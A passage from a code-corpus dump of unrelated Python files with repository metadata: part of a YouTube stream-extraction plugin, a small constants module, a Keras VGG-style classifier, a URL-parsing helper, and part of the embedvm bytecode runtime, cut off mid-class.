    protected (ciphered) streams, in which case None is yielded.
    """
    schema = validate.Schema(
        {"streamingData": {
            validate.optional("hlsManifestUrl"): str,
            validate.optional("formats"): [validate.all(
                {
                    "itag": int,
                    "qualityLabel": str,
                    validate.optional("url"): validate.url(scheme="http")
                },
                validate.union_get("url", "qualityLabel")
            )],
            validate.optional("adaptiveFormats"): [validate.all(
                {
                    "itag": int,
                    "mimeType": validate.all(
                        str,
                        validate.transform(cls._re_mime_type.search),
                        validate.union_get("type", "codecs"),
                    ),
                    validate.optional("url"): validate.url(scheme="http"),
                    validate.optional("qualityLabel"): str
                },
                validate.union_get("url", "qualityLabel", "itag", "mimeType")
            )]
        }},
        validate.get("streamingData"),
        validate.union_get("hlsManifestUrl", "formats", "adaptiveFormats")
    )
    hls_manifest, formats, adaptive_formats = validate.validate(schema, data)
    return hls_manifest, formats or [], adaptive_formats or []
def _create_adaptive_streams(self, adaptive_formats):
    """
    Build streams from adaptive (separate audio/video) formats: plain audio
    streams, plus muxed audio+video streams when FFmpeg muxing is usable.
    """
    streams = {}
    adaptive_streams = {}
    best_audio_itag = None

    # Extract audio streams from the adaptive format list
    for url, label, itag, mimeType in adaptive_formats:
        if url is None:
            # Protected stream without a direct URL; skip it.
            continue
        # extract any high quality streams only available in adaptive formats
        adaptive_streams[itag] = url

        stream_type, stream_codecs = mimeType
        if stream_type == "audio":
            streams[f"audio_{stream_codecs}"] = HTTPStream(self.session, url)

            # find the best quality audio stream m4a, opus or vorbis
            if best_audio_itag is None or self.adp_audio[itag] > self.adp_audio[best_audio_itag]:
                best_audio_itag = itag

    if best_audio_itag and adaptive_streams and MuxedStream.is_usable(self.session):
        # Pair each available video-only itag with the best audio stream.
        aurl = adaptive_streams[best_audio_itag]
        for itag, name in self.adp_video.items():
            if itag not in adaptive_streams:
                continue
            vurl = adaptive_streams[itag]
            log.debug(f"MuxedStream: v {itag} a {best_audio_itag} = {name}")
            streams[name] = MuxedStream(
                self.session,
                HTTPStream(self.session, vurl),
                HTTPStream(self.session, aurl)
            )

    return streams
def _get_res(self, url):
    """
    GET the URL and, if redirected to YouTube's consent page, submit the
    hidden consent form so the real page content is returned.
    """
    res = self.session.http.get(url)
    if urlparse(res.url).netloc == "consent.youtube.com":
        c_data = {}
        # Collect all hidden form inputs to replay them in the POST.
        for _i in itertags(res.text, "input"):
            if _i.attributes.get("type") == "hidden":
                c_data[_i.attributes.get("name")] = unescape(_i.attributes.get("value"))
        log.debug(f"c_data_keys: {', '.join(c_data.keys())}")
        res = self.session.http.post("https://consent.youtube.com/s", data=c_data)
    return res
@staticmethod
def _get_data_from_regex(res, regex, descr):
    """Search the response body with ``regex`` and parse group 1 as JSON."""
    found = regex.search(res.text)
    if found is None:
        log.debug(f"Missing {descr}")
        return
    return parse_json(found.group(1))
def _get_data_from_api(self, res):
    """
    Fallback: fetch the player response via the innertube API when it could
    not be scraped from the page HTML. Returns parsed JSON or None.
    """
    # Resolve the video id either from the URL match or the page's
    # canonical <link> element.
    _i_video_id = self.match.group("video_id")
    if _i_video_id is None:
        for link in itertags(res.text, "link"):
            if link.attributes.get("rel") == "canonical":
                try:
                    _i_video_id = self.matcher.match(link.attributes.get("href")).group("video_id")
                except AttributeError:
                    return
                break
        else:
            return

    # Scrape the API key / client version from the page; the literals below
    # are publicly-known defaults used when scraping fails.
    try:
        _i_api_key = re.search(r'"INNERTUBE_API_KEY":\s*"([^"]+)"', res.text).group(1)
    except AttributeError:
        _i_api_key = "AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8"

    try:
        _i_version = re.search(r'"INNERTUBE_CLIENT_VERSION":\s*"([\d\.]+)"', res.text).group(1)
    except AttributeError:
        _i_version = "1.20210616.1.0"

    res = self.session.http.post(
        "https://www.youtube.com/youtubei/v1/player",
        headers={"Content-Type": "application/json"},
        params={"key": _i_api_key},
        data=json.dumps({
            "videoId": _i_video_id,
            "context": {
                "client": {
                    "clientName": "WEB_EMBEDDED_PLAYER",
                    "clientVersion": _i_version,
                    "platform": "DESKTOP",
                    "clientFormFactor": "UNKNOWN_FORM_FACTOR",
                    "browserName": "Chrome",
                },
                "user": {"lockedSafetyMode": "false"},
                "request": {"useSsl": "true"},
            }
        }),
    )
    return parse_json(res.text)
@staticmethod
def _data_video_id(data):
    """Return the first videoId found in a ytInitialData blob, or None."""
    if data:
        for videoRenderer in search_dict(data, "videoRenderer"):
            videoId = videoRenderer.get("videoId")
            if videoId is not None:
                return videoId

def _data_status(self, data):
    """Return True if the player response says the video is playable."""
    if not data:
        return False
    status, reason = self._schema_playabilitystatus(data)
    if status != "OK":
        self.log.error(f"Could not get video info - {status}: {reason}")
        return False
    return True
def _get_streams(self):
    """
    Resolve the page (following channel pages to their current video),
    obtain the player response (scraped or via API), and build the
    progressive / muxed-adaptive / HLS stream mapping.
    """
    res = self._get_res(self.url)

    if self.match.group("channel") and not self.match.group("channel_live"):
        # A plain channel page: find the currently featured video.
        initial = self._get_data_from_regex(res, self._re_ytInitialData, "initial data")
        video_id = self._data_video_id(initial)
        if video_id is None:
            self.log.error("Could not find videoId on channel page")
            return
        self.url = self._url_canonical.format(video_id=video_id)
        res = self._get_res(self.url)

    # Prefer the embedded player response; fall back to the innertube API.
    data = self._get_data_from_regex(res, self._re_ytInitialPlayerResponse, "initial player response")
    if not self._data_status(data):
        data = self._get_data_from_api(res)
        if not self._data_status(data):
            return

    video_id, self.author, self.title, is_live = self._schema_videodetails(data)
    log.debug(f"Using video ID: {video_id}")

    if is_live:
        log.debug("This video is live.")

    streams = {}
    hls_manifest, formats, adaptive_formats = self._schema_streamingdata(data)

    # A missing URL in any format indicates ciphered/protected streams.
    protected = next((True for url, *_ in formats + adaptive_formats if url is None), False)
    if protected:
        log.debug("This video may be protected.")

    # Progressive (audio+video in one file) formats.
    for url, label in formats:
        if url is None:
            continue
        streams[label] = HTTPStream(self.session, url)

    if not is_live:
        # Live streams only mux sensibly via HLS; VODs get adaptive muxing.
        streams.update(self._create_adaptive_streams(adaptive_formats))

    if hls_manifest:
        streams.update(HLSStream.parse_variant_playlist(self.session, hls_manifest, name_key="pixels"))

    if not streams and protected:
        raise PluginError("This plugin does not support protected videos, try youtube-dl instead")

    return streams
__plugin__ = YouTube
| 37.300292 | 125 | 0.553619 |
20cf87c3ea8aec899dc05b715818537728bcac23 | 180 | py | Python | src/globals_consts.py | Command-Master/MCCC | a49440bfd8542002aee35d41bee093dc8b51d781 | [
"MIT"
] | 6 | 2021-01-15T03:49:01.000Z | 2021-11-02T10:43:22.000Z | src/globals_consts.py | Command-Master/MCCC | a49440bfd8542002aee35d41bee093dc8b51d781 | [
"MIT"
] | null | null | null | src/globals_consts.py | Command-Master/MCCC | a49440bfd8542002aee35d41bee093dc8b51d781 | [
"MIT"
] | null | null | null | from collections import namedtuple
NAMESPACE = 'mccc'
cname = lambda x: type(x).__name__
return_types = {}
arguments = {}
BinaryOp = namedtuple('BinaryOp', ['op', 'left', 'right']) | 30 | 58 | 0.705556 |
ed886913f87c71e5100df1dff85767a6eea7e84b | 6,465 | py | Python | citrus_pest_diseases_recognition/Bridge_VGG19.py | xingshulicc/xingshulicc | 8009b44732bf5d01cb0463146ab9f370c694af29 | [
"MIT"
] | 10 | 2018-11-27T06:38:17.000Z | 2021-10-24T02:11:58.000Z | citrus_pest_diseases_recognition/Bridge_VGG19.py | xingshulicc/xingshulicc | 8009b44732bf5d01cb0463146ab9f370c694af29 | [
"MIT"
] | 2 | 2020-04-18T06:46:11.000Z | 2021-03-04T08:00:27.000Z | citrus_pest_diseases_recognition/Bridge_VGG19.py | xingshulicc/xingshulicc | 8009b44732bf5d01cb0463146ab9f370c694af29 | [
"MIT"
] | 1 | 2020-12-29T07:41:47.000Z | 2020-12-29T07:41:47.000Z | # -*- coding: utf-8 -*-
from __future__ import print_function
"""
Created on Wed Aug 28 09:24:42 2019
@author: xingshuli
"""
from keras.layers import Conv2D
from keras.layers import Dense
from keras.layers import Activation
from keras.layers import MaxPooling2D
from keras.layers import GlobalAveragePooling2D
from keras.layers import Input
from keras.layers import Dropout
from keras.layers import BatchNormalization
from keras.layers import Concatenate
from keras import backend as K
from keras.models import Model
from keras.utils import plot_model
from keras import regularizers
weight_decay = 0.005
def _block1(inputs, filters, block):
    """Two 3x3 Conv/BN/ReLU stages followed by a 2x2 strided max-pooling."""
    if K.image_data_format() == 'channels_first':
        bn_axis = 1
    else:
        bn_axis = -1
    base_name = 'block' + '_' + str(block)

    x = inputs
    # Repeat the conv -> batch-norm -> relu stage twice, numbering layers
    # exactly as the original hand-unrolled version did.
    for stage in (1, 2):
        suffix = '_' + str(stage)
        x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
                   name = base_name + '_conv' + suffix)(x)
        x = BatchNormalization(axis = bn_axis, name = base_name + '_bn' + suffix)(x)
        x = Activation('relu', name = base_name + '_relu' + suffix)(x)

    x = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
                     name = base_name + '_MaxPool')(x)
    return x
def _block2(inputs, filters, block):
    """Four 3x3 Conv/BN/ReLU stages (VGG19-style block) without pooling."""
    if K.image_data_format() == 'channels_first':
        bn_axis = 1
    else:
        bn_axis = -1
    base_name = 'block' + '_' + str(block)

    x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
               name = base_name + '_conv_1')(inputs)
    x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_1')(x)
    x = Activation('relu', name = base_name + '_relu_1')(x)

    x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
               name = base_name + '_conv_2')(x)
    x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_2')(x)
    x = Activation('relu', name = base_name + '_relu_2')(x)

    x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
               name = base_name + '_conv_3')(x)
    x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_3')(x)
    x = Activation('relu', name = base_name + '_relu_3')(x)

    x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
               name = base_name + '_conv_4')(x)
    x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_4')(x)
    x = Activation('relu', name = base_name + '_relu_4')(x)

    # Note: unlike _block1, no pooling here — callers pool explicitly.
    return x
def _bridge_block(inputs, filters, block):
    """
    Two 1x1 Conv/BN/ReLU stages used to compress concatenated feature maps.

    Uses bias-free convolutions with L2 weight decay, unlike the 3x3
    blocks above.
    """
    channel_axis = 1 if K.image_data_format() == 'channels_first' else -1
    base_name = 'bridge_block' + '_' + str(block)

    x = Conv2D(filters = filters, kernel_size = (1, 1), strides = (1, 1), padding = 'same',
               use_bias = False, kernel_regularizer = regularizers.l2(weight_decay), name = base_name + '_conv_1')(inputs)
    x = BatchNormalization(axis = channel_axis, name = base_name + '_bn_1')(x)
    x = Activation('relu', name = base_name + '_relu_1')(x)

    x = Conv2D(filters = filters, kernel_size = (1, 1), strides = (1, 1), padding = 'same',
               use_bias = False, kernel_regularizer = regularizers.l2(weight_decay), name = base_name + '_conv_2')(x)
    x = BatchNormalization(axis = channel_axis, name = base_name + '_bn_2')(x)
    x = Activation('relu', name = base_name + '_relu_2')(x)

    return x
def Bridge_VGG(input_shape, classes):
    """Builds the bridge_vgg19 Keras model.

    A VGG-style backbone (_block1/_block2) with parallel "bridge" branches:
    at each scale the previous stage's output is concatenated with the current
    one and reduced by a _bridge_block, then both paths are max-pooled in
    lockstep. The final classifier is GAP -> Dense(512) -> Dropout -> softmax.

    :param input_shape: shape tuple passed to ``Input`` (comments below assume
        224x224 inputs -- TODO confirm).
    :param classes: number of output classes for the softmax head.
    :returns: the compiled-free ``Model``; also writes model_bridge_vgg19.png.
    """
    inputs = Input(shape = input_shape)
    x_1 = _block1(inputs = inputs, filters = 64, block = 1)
    # The shape of x_1: 112 x 112 x 64
    x_2 = _block1(inputs = x_1, filters = 128, block = 2)
    # The shape of x_2: 56 x 56 x 128
    x_3 = _block2(inputs = x_2, filters = 256, block = 3)
    # The shape of x_3: 56 x 56 x 256
    bridge_1 = Concatenate(axis = -1)([x_2, x_3])
    # The shape of bridge_1: 56 x 56 x 384
    bridge_2 = _bridge_block(inputs = bridge_1, filters = 256, block = 1)
    # The shape of bridge_2: 56 x 56 x 256
    maxpool_1 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
                             name = 'MaxPool_1')(x_3)
    # The shape of maxpool_1: 28 x 28 x 256
    bridge_pool_1 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
                                 name = 'MaxPool_bridge_1')(bridge_2)
    # The shape of bridge_pool_1: 28 x 28 x 256
    x_4 = _block2(inputs = maxpool_1, filters = 512, block = 4)
    # The shape of x_4: 28 x 28 x 512
    bridge_3 = Concatenate(axis = -1)([bridge_pool_1, x_4])
    # The shape of bridge_3: 28 x 28 x 768
    bridge_4 = _bridge_block(inputs = bridge_3, filters = 512, block = 2)
    # The shape of bridge_4: 28 x 28 x 512
    maxpool_2 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
                             name = 'MaxPool_2')(x_4)
    # The shape of maxpool_2: 14 x 14 x 512
    bridge_pool_2 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
                                 name = 'MaxPool_bridge_2')(bridge_4)
    # The shape of bridge_pool_2: 14 x 14 x 512
    x_5 = _block2(inputs = maxpool_2, filters = 512, block = 5)
    # The shape of x_5: 14 x 14 x 512
    bridge_5 = Concatenate(axis = -1)([bridge_pool_2, x_5])
    # The shape of bridge_5: 14 x 14 x 1024
    bridge_6 = _bridge_block(inputs = bridge_5, filters = 512, block = 3)
    # The shape of bridge_6: 14 x 14 x 512
    bridge_pool_3 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
                                 name = 'MaxPool_bridge_3')(bridge_6)
    # The shape of bridge_pool_3: 7 x 7 x 512
    output = GlobalAveragePooling2D()(bridge_pool_3)
    output = Dense(512, activation = 'relu', name = 'fc_1')(output)
    output = Dropout(0.5)(output)
    output = Dense(classes, activation = 'softmax', name = 'fc_2')(output)
    model = Model(inputs = inputs, outputs = output, name = 'bridge_vgg19')
    plot_model(model, to_file = 'model_bridge_vgg19.png',show_shapes = True, show_layer_names = True)
    return model
| 38.482143 | 122 | 0.608198 |
f2622136e6829e17834956b82caa521de6171600 | 1,546 | py | Python | huskar_api/models/infra/utils.py | mowangdk/huskar | 7692fbc5672a5ae6e2a33616c493466a7137f8cd | [
"MIT"
] | 59 | 2019-10-31T10:50:10.000Z | 2021-11-26T04:32:25.000Z | huskar_api/models/infra/utils.py | mowangdk/huskar | 7692fbc5672a5ae6e2a33616c493466a7137f8cd | [
"MIT"
] | 5 | 2019-10-31T10:37:30.000Z | 2020-03-02T06:45:46.000Z | huskar_api/models/infra/utils.py | mowangdk/huskar | 7692fbc5672a5ae6e2a33616c493466a7137f8cd | [
"MIT"
] | 9 | 2019-10-31T10:35:00.000Z | 2019-12-01T14:13:58.000Z | from __future__ import absolute_import
import re
# Loose RFC 1738 grammar: scheme://user:password@host:port/path, where every
# component after "scheme://" is optional. Hosts may be bracketed IPv6.
rfc1738_pattern = re.compile(r'''
    (?P<name>[\w\+]+)://
    (?:
        (?P<username>[^:/]*)
        (?::(?P<password>.*))?
    @)?
    (?:
        (?:
            \[(?P<ipv6host>[^/]+)\] |
            (?P<ipv4host>[^/:]+)
        )?
        (?::(?P<port>[^/]*))?
    )?
    (?:/(?P<path>.*))?
    ''', re.X)
def parse_rfc1738_args(url):
    """Parse URL with the RFC 1738.

    :param url: The URL string.
    :returns: Dict of the named groups above; absent components are ``None``.
    :raises ValueError: If *url* does not match the grammar.
    """
    match = rfc1738_pattern.match(url)
    if not match:
        raise ValueError('Cannot parse RFC 1738 URL: {!r}'.format(url))
    return match.groupdict()
def extract_application_name(url):
    """Parses the Sam URL and returns its application name.

    :param url: The URL string.
    :returns: The application name, or ``None`` if this is not a Sam URL.
    """
    try:
        parsed = parse_rfc1738_args(url)
    except ValueError:
        # Not even URL-shaped, so certainly not a Sam URL.
        return None
    if (parsed['name'] or '').startswith('sam+'):
        return parsed['ipv4host'] or parsed['ipv6host']
    return None
def extract_application_names(urls):
    """Parses the Sam URLs and returns names of valid applications.

    Entries that are not Sam URLs (``extract_application_name`` returns a
    falsy value) are dropped from the result.

    :param urls: The list or dictionary of Sam URLs.
    :returns: The list or dictionary of application names.
    """
    if isinstance(urls, dict):
        # ``items()`` instead of the Python-2-only ``iteritems()``: identical
        # iteration on Python 2, and keeps the helper portable to Python 3.
        iterator = (
            (key, extract_application_name(url))
            for key, url in urls.items())
        return {key: name for key, name in iterator if name}
    iterator = (extract_application_name(url) for url in urls)
    return [name for name in iterator if name]
| 26.20339 | 73 | 0.575032 |
33440ab8f41fbb88247329030ab624d4d964475b | 15,676 | py | Python | embedvm/pysrc/embedvm/runtime.py | tcr/avrvm | d356a20ac7b413f332efdc5858bc72c2483a97ee | [
"MIT"
] | 2 | 2020-05-03T07:52:35.000Z | 2021-06-22T15:51:25.000Z | embedvm/pysrc/embedvm/runtime.py | tcr/avrvm | d356a20ac7b413f332efdc5858bc72c2483a97ee | [
"MIT"
] | null | null | null | embedvm/pysrc/embedvm/runtime.py | tcr/avrvm | d356a20ac7b413f332efdc5858bc72c2483a97ee | [
"MIT"
] | null | null | null | from .bytecode import signext, assert_signexted
from . import bytecode
from .python import CodeObject, raising_int, UnboundSetter
from .asm import DataBlock
from collections import namedtuple
import ast
from math import ceil
class Importable(CodeObject):
    """All objects that are supposed to be imported into an EVM Python program
    need to subclass this to indicate that they will react properly to code
    generation requests (e.g. ``call`` / ``push_value`` hooks)."""
class Ignore(Importable):
    """Parent class for objects that are supposed to be imported, but will only
    be used in __name__ == "__main__" guarded code (that is never parsed by the
    compiler)."""
    # Any attempt to generate code for an ignored object is a programming
    # error, so every codegen entry point funnels into this raise.
    def _raise(self):
        raise Exception("Trying to compile ignored code.")
class ignore(Ignore):
    """Function decorator for functions that are supposed to behave like
    Ignore'd objects: the wrapped function stays callable at runtime but is
    treated as un-compilable by the EVM compiler."""
    def __init__(self, func):
        # Keep the wrapped callable accessible as ``self.func``.
        self.func = func
    def __call__(self, *args, **kwargs):
        # Transparent pass-through so decorated functions work normally
        # in plain Python (e.g. under ``__main__``).
        return self.func(*args, **kwargs)
class _UserfuncWrapper(Importable):
    """Wraps a host-side Python function so calls to it compile down to the
    VM's CallUserFunction opcode. ``which`` is the user-function slot number;
    when it is ``None``, the slot is taken from the call's first argument."""
    def __init__(self, which, func):
        self.__which = which
        self.__func = func
    def __call__(self, *args, **kwargs):
        # Plain-Python execution path: just invoke the wrapped function.
        return self.__func(*args, **kwargs)
    def call(self, context, args, keywords, starargs, kwargs):
        # Compiler hook: defer code emission until the value is pushed.
        return self.PushableUserfunc(self.__which, args, keywords, starargs, kwargs)
    class PushableUserfunc(Importable, namedtuple("PushableData", "which args keywords starargs kwargs")):
        def push_value(self, context):
            # Only positional arguments can be marshalled onto the VM stack.
            if self.keywords or self.starargs or self.kwargs:
                raise Exception("Can not call wrapped user function with non-positional arguments.")
            argv = self.args
            # With an unbound slot (which is None), argv[0] is the slot
            # number and is not passed to the user function itself.
            real_args = argv if self.which is not None else argv[1:]
            # Push arguments in reverse so the callee pops them in order,
            # then push the argument count.
            for a in real_args[::-1]:
                context.append_push(a)
            context.append_push(len(real_args))
            if self.which is None:
                # Slot number comes from the literal first argument
                # (an ast.Num node).
                which = raising_int(argv[0].n)
            else:
                which = self.which
            context.code.append(bytecode.CallUserFunction(which))
def UserfuncWrapper(which=None):
    """Decorator factory: wraps a function in a ``_UserfuncWrapper`` bound to
    user-function slot ``which`` (``None`` means the slot number is supplied
    as the first argument of each call)."""
    def decorator(func):
        return _UserfuncWrapper(which, func)
    return decorator
class _C_Division(Importable):
    """When you need Python to behave like C with respect to divisions, write
    c_division(a, b) instead of a/b. C's behavior with respect to negative
    values of b will be used, as it is used in the VM.

    NOTE(review): the arithmetic below relies on Python 2 / RPython integer
    ``/`` (floor division on ints); under Python 3 semantics these branches
    would return floats -- confirm the target interpreter before changing.
    """
    def __call__(self, a, b):
        # C truncates toward zero; Python floors. Each mixed-sign case is
        # rewritten so the inner division works on non-negative operands.
        if a > 0 and b < 0:
            return -(a/(-b))
        elif a < 0 and b < 0:
            return a / b
        elif a < 0 and b > 0:
            return -((-a)/b)
        else:
            return a / b
    def call(self, context, args, keywords, starargs, kwargs):
        # Compiler hook: c_division(a, b) takes exactly two positional args.
        if keywords or starargs or kwargs or len(args) != 2:
            raise Exception("c_division requires exactly two arguments.")
        return self.Pushable(args)
    class Pushable(Importable):
        def __init__(self, args):
            self.a, self.b = args
        def push_value(self, context):
            # Push both operands, then emit the VM's (C-semantics) Div opcode.
            context.append_push(self.a)
            context.append_push(self.b)
            context.code.append(bytecode.Div())
# Module-level singleton used by compiled programs: c_division(a, b).
c_division = _C_Division()
class Globals(list):
    """Enhanced list of uint8 values that supports the access modes needed for
    the EVM. It also supports views on global arrays and variables.
    While write access to views on arrays can be implemented easily (like
    ``my_array = gv.array16(0); my_array[23] = 42``), a trick is employed to
    implement write access single variables (assigning to which would overwrite
    the binding): If something is assigned to a Globals, it is remembered in
    _known_view. On later assignments, instead of re-assigning, the previously
    assigned value's set function is called with the new value::
    >>> gv = Globals([0]*16)
    >>> gv.foo = gv.array8s(address=0)
    >>> gv.bar = gv.int8s(address=8)
    >>> gv.foo[7] = 10
    >>> gv.bar = 9
    """
    def __init__(self, *args):
        super(Globals, self).__init__(*args)
        # Stored via __dict__ to avoid recursing into our own __setattr__.
        self.__dict__['_known_view'] = {}
    def __setattr__(self, key, value):
        # First assignment registers the view; later assignments delegate to
        # the registered view's set() (see class docstring).
        if key in self._known_view:
            self.__dict__['_known_view'][key].set(value)
        else:
            self.__dict__['_known_view'][key] = value
    def __getattr__(self, key):
        return self.__dict__['_known_view'][key].get()
    # All accessors below auto-grow the backing byte list on demand.
    # 16-bit values are stored big-endian (high byte first).
    def get16(self, address):
        if len(self) < address+2:
            self.extend([0]*(address+2-len(self)))
        return signext((self[address]<<8) + self[address+1], 0xffff)
    def get8s(self, address):
        if len(self) < address+1:
            self.extend([0]*(address+1-len(self)))
        return signext(self[address], 0xff)
    def get8u(self, address):
        if len(self) < address+1:
            self.extend([0]*(address+1-len(self)))
        return self[address]
    def set16(self, address, value):
        if len(self) < address+2:
            self.extend([0]*(address+2-len(self)))
        assert_signexted(value, 0xffff)
        # NOTE(review): for negative values divmod stores a negative high
        # byte; get16 round-trips it, but confirm binary emitters expect this.
        self[address:address+2] = divmod(value, 0x100)
    def set8s(self, address, value):
        if len(self) < address+1:
            self.extend([0]*(address+1-len(self)))
        assert_signexted(value, 0xff)
        self[address] = value%256
    def set8u(self, address, value):
        if len(self) < address+1:
            self.extend([0]*(address+1-len(self)))
        self[address] = value & 0xff
    # Factory shortcuts used by EVM programs: gv.array16(...), gv.int8u(...).
    array16 = lambda self, address=None, init=None, length=None: self.ArrayView16(self, address, init, length)
    array8u = lambda self, address=None, init=None, length=None: self.ArrayView8u(self, address, init, length)
    array8s = lambda self, address=None, init=None, length=None: self.ArrayView8s(self, address, init, length)
    int16 = lambda self, address=None, init=None: self.SingleView16(self, address, init)
    int8u = lambda self, address=None, init=None: self.SingleView8u(self, address, init)
    int8s = lambda self, address=None, init=None: self.SingleView8s(self, address, init)
    class View(object):
        # Base for live views; address defaults to the current end of gv.
        def __init__(self, gv, address):
            self.gv = gv
            self.address = address if address is not None else len(gv)
    class SingleView(View):
        def __init__(self, gv, address, init_value):
            super(gv.SingleView, self).__init__(gv, address)
            if init_value is None:
                self.set(self.get()) # make sure gv is sized appropriately
            else:
                self.set(init_value)
    class SingleView8s(SingleView):
        get = lambda self: self.gv.get8s(self.address)
        set = lambda self, value: self.gv.set8s(self.address, value)
    class SingleView8u(SingleView):
        get = lambda self: self.gv.get8u(self.address)
        set = lambda self, value: self.gv.set8u(self.address, value)
    class SingleView16(SingleView):
        get = lambda self: self.gv.get16(self.address)
        set = lambda self, value: self.gv.set16(self.address, value)
    class ArrayView(View):
        def __init__(self, gv, address, init_value, length):
            super(gv.ArrayView, self).__init__(gv, address)
            if init_value is not None:
                for (i, x) in enumerate(init_value):
                    self[i] = x
            if length is not None:
                for i in range(length):
                    self[i] = self[i] # make sure gv is long enough
                self.length = length
            if length is None and init_value is None:
                raise Exception("Undespecified array")
        def get(self):
            return self
    class ArrayView8s(ArrayView):
        sizeofelement = 1
        __getitem__ = lambda self, index: self.gv.get8s(self.address + index)
        __setitem__ = lambda self, index, value: self.gv.set8s(self.address + index, value)
    class ArrayView8u(ArrayView):
        sizeofelement = 1
        __getitem__ = lambda self, index: self.gv.get8u(self.address + index)
        __setitem__ = lambda self, index, value: self.gv.set8u(self.address + index, value)
    class ArrayView16(ArrayView):
        sizeofelement = 2
        __getitem__ = lambda self, index: self.gv.get16(self.address + 2*index)
        __setitem__ = lambda self, index, value: self.gv.set16(self.address + 2*index, value)
    @classmethod
    def import_to_codeobject(cls, self):
        # this is a very crude hack: called either on the class itself (use
        # the compile-time GlobalCodeObject directly) or on a live instance
        # (replay its registered views into a fresh GlobalCodeObject).
        if cls is self:
            return cls.GlobalCodeObject
        else:
            assert isinstance(self, cls)
            ret = cls.GlobalCodeObject()
            for name, view in sorted(self.__dict__['_known_view'].items(), key=lambda (k, v): v.address):
                viewtype = getattr(ret, type(view).__name__) # luckily they use the same names
                accessor = viewtype(ret).call(None, [ast.Num(n=view.address)], [ast.keyword('length', ast.Num(n=view.length))] if hasattr(view, 'length') else [], None, None)
                ret.getattr(None, name).global_assign(accessor)
            return ret
    @classmethod
    def _raise(self):
        raise Exception("This is a live object, it can't be handled (should have be import_to_codeobject'd by now)")
    class GlobalCodeObject(CodeObject, DataBlock):
        """Compile-time counterpart of Globals: lays out declared views in a
        flat byte block and emits load/store bytecode for attribute access."""
        def __init__(self):
            self.assigned = []
            self.named = {} # name -> view object
            self.pos = 0
        length = property(lambda self: self.pos)
        @classmethod
        def call(cls, context, args, keywords, starargs, kwargs):
            if args or keywords or starargs or kwargs:
                raise Exception("Global object can't take any arguments")
            gco = cls()
            context.blocks.append(gco)
            return gco
        def getattr(self, context, attr):
            # Accessor factories (int8s, array16, ...) beat declared names;
            # unknown names yield a setter that performs the declaration.
            if attr in self.accessor_types:
                return self.accessor_types[attr](self)
            elif attr in self.named:
                return self.named[attr]
            else:
                def assign_value(value):
                    self.named[attr] = value
                    value.pos = self.pos
                    if value.specified_pos is not None and value.specified_pos != value.pos:
                        raise Exception("Following forced memory alignment is only supported if it fits.")
                    self.pos += value.bytes
                return UnboundSetter(assign_value)
        def to_binary(self, startpos):
            # Zero-filled block with each view's initializer patched in.
            data = [0] * self.pos
            for view in self.named.values():
                view.store_initial_value(data)
            return data
        class View(CodeObject):
            def __init__(self, gv):
                self.gv = gv
            def call(self, context, args, keywords, starargs, kwargs):
                # Optional positional arg = forced address; keywords carry
                # 'init' and/or 'length' as literals.
                if starargs or kwargs:
                    raise Exception("Can't handle those arguments")
                if len(args) not in (0, 1) or len(args) == 1 and not isinstance(args[0], ast.Num):
                    raise Exception("Can't handle those arguments")
                if args:
                    self.specified_pos = raising_int(args[0].n)
                else:
                    self.specified_pos = None
                keywords_converted = {}
                for k in keywords:
                    keywords_converted[k.arg] = ast.literal_eval(k.value)
                self.init = keywords_converted.pop('init', None)
                if 'length' in keywords_converted:
                    self.length = keywords_converted.pop('length', None)
                if self.length is None and self.init is None:
                    raise Exception("Global variable is underspecified.")
                if self.length is None: # never happens for arrays
                    self.length = len(self.init)
                self.bytes = self.length * self.bytes_per_item
                return self
        class SingleView(View):
            length = 1
            # nargs picks the 1- vs 2-byte address encoding of the opcode.
            def pop_set(self, context):
                context.code.append(self.store_code(address=self.pos, nargs=1 if self.pos < 256 else 2, popoffset=False))
            def push_value(self, context):
                context.code.append(self.load_code(address=self.pos, nargs=1 if self.pos < 256 else 2, popoffset=False))
        class ArrayView(View):
            length = None
            def getslice(self, context, slice):
                return self.SliceView(self, slice)
            class SliceView(CodeObject):
                # array[index]: the index is pushed and the opcode pops it
                # as an offset (popoffset=True).
                def __init__(self, array, slice):
                    self.array = array
                    if not isinstance(slice, ast.Index):
                        raise Exception("Can not deal with non-index slice.")
                    self.slice = slice.value
                def pop_set(self, context):
                    context.append_push(self.slice)
                    context.code.append(self.array.store_code(address=self.array.pos, nargs=1 if self.array.pos < 256 else 2, popoffset=True))
                def push_value(self, context):
                    context.append_push(self.slice)
                    context.code.append(self.array.load_code(address=self.array.pos, nargs=1 if self.array.pos < 256 else 2, popoffset=True))
        class SingleView8s(SingleView):
            bytes_per_item = 1
            store_code = bytecode.GlobalStoreS8
            load_code = bytecode.GlobalLoadS8
            def store_initial_value(self, list):
                if self.init is not None:
                    list[self.pos] = self.init % 256
        class SingleView8u(SingleView):
            bytes_per_item = 1
            store_code = bytecode.GlobalStoreU8
            load_code = bytecode.GlobalLoadU8
            def store_initial_value(self, list):
                if self.init is not None:
                    list[self.pos] = self.init % 256
        class SingleView16(SingleView):
            bytes_per_item = 2
            store_code = bytecode.GlobalStore16
            load_code = bytecode.GlobalLoad16
            def store_initial_value(self, list):
                if self.init is not None:
                    a, b = divmod(self.init, 0x100)
                    a = a % 0x100
                    list[self.pos:self.pos+2] = a, b
        class ArrayView8s(ArrayView):
            bytes_per_item = 1
            store_code = bytecode.GlobalStoreS8
            load_code = bytecode.GlobalLoadS8
            def store_initial_value(self, list):
                if self.init is not None:
                    for (i, v) in enumerate(self.init):
                        list[self.pos + i] = v % 256
        class ArrayView8u(ArrayView):
